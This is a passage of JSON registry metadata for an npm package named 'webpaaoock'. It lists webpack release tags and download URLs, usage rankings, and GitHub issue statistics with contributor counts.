"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-24T12:22:50.002Z","dependent_packages_count":0,"downloads":9,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":54.12805865929274,"dependent_repos_count":25.30552159382132,"dependent_packages_count":32.889739249478886,"stargazers_count":0.09397124372734732,"forks_count":0.5403655765892438,"average":22.59153126458191},"purl":"pkg:npm/webpaaoock","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpaaoock","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpaaoock","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpaaoock/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-23T22:03:38.647Z","issues_count":10162,"pull_requests_count":9416,"avg_time_to_close_issue":10851837.262126112,"avg_time_to_close_pull_request":2752563.5630498533,"issues_closed_count":9896,"pull_requests_closed_count":8866,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834875024601456,"avg_comments_per_pull_request":3.1704545454545454,"merged_pull_requests_count":6005,"bot_issues_count":8,"bot_pull_requests_count":2910,"past_year_issues_count":80,"past_year_pull_requests_count":923,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":366049.1685082873,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":724,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.425,"past_year_avg_comments_per_pull_request":4.787648970747562,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":139,"past_year_merged_pull_requests_count":572,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1066,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/a